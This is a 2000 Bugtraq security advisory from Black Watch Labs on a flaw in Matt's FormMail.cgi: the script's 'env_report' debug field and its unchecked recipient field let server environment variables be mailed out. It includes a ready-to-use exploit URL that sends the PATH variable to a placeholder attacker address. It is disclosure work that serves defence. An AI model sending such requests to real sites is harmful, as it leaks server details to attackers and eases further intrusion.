![[LWN Logo]](/images/lwn.banner.gif)
Date: Wed, 10 May 2000 16:11:23 -0700
From: Black Watch Labs <blackwatchlabs@PERFECTOTECH.COM>
Subject: Black Watch Labs Vulnerability Alert
To: BUGTRAQ@SECURITYFOCUS.COM
Dear Security Professional,
The following vulnerability:
"Environment and setup variables can be viewed through FormMail
script"
is in the text of the message below and has just been posted to the
Black Watch Labs Web site at
http://www.perfectotech.com/blackwatchlabs/
Thank you,
Black Watch Labs
If you wish to unsubscribe to this Black Watch Labs email update, please
click on reply and type the word "Unsubscribe" in the subject line.
--------------------------------------------------------------------------------------------------------------------------------
Environment and setup variables can be viewed through FormMail script
Perfecto’s Black Watch Labs Advisory BWL 00-06 (May 10, 2000)
Name:
Environment and setup variables can be viewed through FormMail script
Black Watch Labs ID:
BWL 00-06
Date Released:
May 10, 2000
Products affected:
Matt’s FormMail.cgi
Number of affected sites:
It is estimated that there are thousands of pages containing links to
the formmail script.
Category:
Application(HTML): modification of parameters, debug options.
Summary:
The script allows several environment variables to be viewed by the
attacker, who can gain useful information on the site, making further
attacks more feasible.
Analysis:
FormMail contains a debug field named “env_report”, whose value is a
list of environment variables (accessed via $ENV[name]) separated by
commas. These variables (if they exist) are embedded into the message
body. Furthermore, the script does not check the integrity of the
recipient, thus the recipient field can be changed, so the message will
be sent to the attacker’s account. Thus the attacker can gain the
environment information.
Exploits:
FormMail: assume the URL for the script is
http://www.formmail.site/cgi-bin/formmail.cgi, then to get the PATH
environment parameter (i.e. to send it to account:
attacker@attacker.site), all there is to do is to request the following
URL:
http://www.formmail.site/cgibin/formmail.cgi?env_report=PATH&recipient=attacker@attacker.site&required=&firstname=&lastname=&email=&message=&Submit=Submit
Vendor Patch or workaround:
None submitted at the time of this release.
References and Links:
Matt’s Script Archive (FormMail):
http://www.worldwidemart.com/scripts/formmail.shtml
About Black Watch Labs (www.perfectotech.com/blackwatchlabs/)
Black Watch Labs is a research group operated by Perfecto Technologies
Inc., leader in Web application security management. Black Watch Labs
was established in order to further the knowledge of the Internet
community in the arena of Web application security management. Black
Watch Labs publishes security advisories regularly, which are maintained
at http://www.perfectotech.com/blackwatchlabs/, and are also posted to
relevant security lists and websites. Black Watch Labs also operates a
Web application security mailing list, which can be subscribed to at
http://www.perfectotech.com/blackwatchlabs/.
For more info about Black Watch Labs and Web Application Security
Management, please call (408) 855-9500 or email
BlackWatchLabs@perfectotech.com
About Perfecto Technologies (www.perfectotech.com)
Founded in 1997 and headquartered in Santa Clara, Calif., Perfecto
Technologies pioneered the market for Web Application Security
Management software. AppShield, Perfecto Technologies flagship product
offering, is the first to provide extreme security for customer-facing
applications in dynamic Web site environments. Perfecto Technologies
has customers in many sectors including, banking, etailing, finance,
government, and healthcare. Privately held, Perfecto Technologies is
funded by blue-chip venture capital firms and industry leaders,
including Sequoia Capital, Walden, and Intel Corporation. More
information about Perfecto Technologies may be obtained by visiting the
Company’s Website at www.perfectotech.com or by calling the Company
directly at (408) 855-9500.
Copyright © 1997-2000 Perfecto Technologies LTD. All rights reserved.
Permission is hereby granted to reproduce and distribute the application
security alerts herein in their entirety, provided the information, this
notice and all other Perfecto Technologies marks remain intact.
Specific Limitations on Use of the Black Watch Labs Advisories
THIS ADVISORY INCLUDES INFORMATION WHICH WILL ILLUSTRATE CERTAIN
SECURITY RISKS AND ISSUES ASSOCIATED WITH SITES ON THE INTERNET,
INCLUDING, POTENTIALLY, YOUR SITE. YOU AGREE THAT YOUR VIEWING OF THIS
ADVISORY IS SOLELY FOR THE PURPOSES OF UNDERSTANDING THESE RISKS AND
ISSUES WITH RESPECT TO YOUR SITE AND THE PRODUCTS AND SERVICES OFFERED
BY PERFECTO TECHNOLOGIES. YOU AGREE NOT TO USE ANY INFORMATION DISCLOSED
TO YOU FOR ANY IMPROPER OR ILLEGAL PURPOSE, INCLUDING TO VIOLATE THE
SECURITY OF ANY OTHER PERSON'S SITE. YOU ARE EXPLICITLY WARNED THAT THE
USE FOR ANY IMPROPER PURPOSE OF INFORMATION DISCLOSED TO YOU COULD
SUBJECT YOU TO CIVIL AND CRIMINAL LIABILITY IN THE UNITED STATES AND
OTHER COUNTRIES.
NO WARRANTY
Any material furnished by Perfecto Technologies is furnished on an “as
is” basis and may change without notice. Perfecto Technologies makes no
warranties of any kind, either expressed or implied as to any matter
including but not limited to, warranty of fitness for a particular
purpose or merchantability, exclusivity or results obtained from use of
the material. Neither does Perfecto Technologies make any warranty of
any kind with respect to freedom from patent, trademark or copyright
infringement. In no event shall Perfecto Technologies be liable for any
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.